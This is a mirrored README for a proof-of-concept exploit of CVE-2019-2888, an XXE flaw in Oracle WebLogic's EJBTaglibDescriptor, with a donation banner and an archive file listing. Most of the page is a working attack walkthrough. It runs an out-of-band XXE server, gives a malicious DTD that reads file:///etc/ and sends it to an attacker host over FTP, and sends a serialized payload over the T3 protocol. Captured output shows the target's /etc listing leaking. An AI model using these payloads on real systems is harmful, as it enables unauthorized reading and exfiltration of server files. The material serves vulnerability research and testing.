Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-2888 PoC — Oracle Fusion Middleware WebLogic Server组件信息泄露漏洞

Source
https://github.com/jas502n/CVE-2019-2888
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server组件信息泄露漏洞 (CVE-2019-2888)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的EJB Container组件存在安全漏洞。攻击者可利用该漏洞未授权读取数据,影响数
Description
WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
Readme
# CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

![](./info.png)

![](./CVE-2019-2888.gif)

https://www.oracle.com/security-alerts/cpuoct2019.html

## fernflower.jar

`weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class`

```
╭─root@jas502n /var 
╰─# find ./ |grep EJBTaglibDescriptor                                                                       ✔  8388  18:32:43 
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
```

```
╭─root@jas502n /var 
╰─# ls                                                                                                      ✔  8392  18:33:22 
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar
```

#### EJBTaglibDescriptor.class to EJBTaglibDescriptor.java
```
╭─root@jas502n /var 
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
 ./
INFO:  Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO:  ... done
╭─root@jas502n /var 
╰─# ls            
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar
```
#### cat EJBTaglibDescriptor.java
![](./EJBTaglibDescriptor.png)
```
╭─root@jas502n /var 
╰─# cat EJBTaglibDescriptor.java

package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

public class EJBTaglibDescriptor implements ToXML, Externalizable {
   private static final long serialVersionUID = -9016538269900747655L;
   private FilesystemInfoDescriptor fileInfo;
   private BeanDescriptor[] beans;
   private transient ClassLoader jarLoader;
   private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";

   static void p(String var0) {
      System.err.println("[EJBTagDesc]: " + var0);
   }
```
## 0x01 下载python xxer

https://github.com/TheTwitchy/xxer

`info: Starting xxer_httpd on port 8989`

`info: Starting xxer_ftpd on port 2121`

`http://10.10.20.100:8989/ext.dtd`

![](./xxe_server.png)
```
╭─root@jas502n ~/xxer ‹master*›
╰─# python xxer.py -p 8989 -H 10.10.20.100

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>




```

####  set file:///etc/ > ext.dtd

```
<!ENTITY % bbb SYSTEM "file:///etc/"><!ENTITY % ccc "<!ENTITY &#37; ddd SYSTEM 'ftp://fakeuser:%bbb;@10.10.20.100:2121/b'>">
```

## 0x02 通过T3协议,发送序列化后的xml payload
![](t3_send_xxe.png)

```
ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001                                                 


 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/
                          /____/

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

                  python By jas502n



[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

"
received "HELO"
sending payload...

ale@Pentest: ~/Desktop/CVE-2019-2888#
```

## 0x03 get /etc dir info
![](./get_etc_dir.png)

```
root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>


10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version
```

## 参考链接

https://github.com/NickstaDB/SerializationDumper

https://github.com/TheTwitchy/xxer

https://github.com/21superman/weblogic_cve-2019-2890

https://paper.seebug.org/1067/

https://www.oracle.com/security-alerts/cpuoct2019.html
File Snapshot

 [4.0K]  /data/pocs/72dbabbc35b6f62e59ebe01985141b7cbe8e19bd
├── [ 14M]  CVE-2019-2888.gif
├── [ 13K]  EJBTaglibDescriptor.java
├── [570K]  EJBTaglibDescriptor.png
├── [194K]  get_etc_dir.png
├── [ 40K]  info.png
├── [6.1K]  README.md
├── [131K]  t3_send_xxe.png
├── [8.5K]  weblogic.py
└── [ 95K]  xxe_server.png

0 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.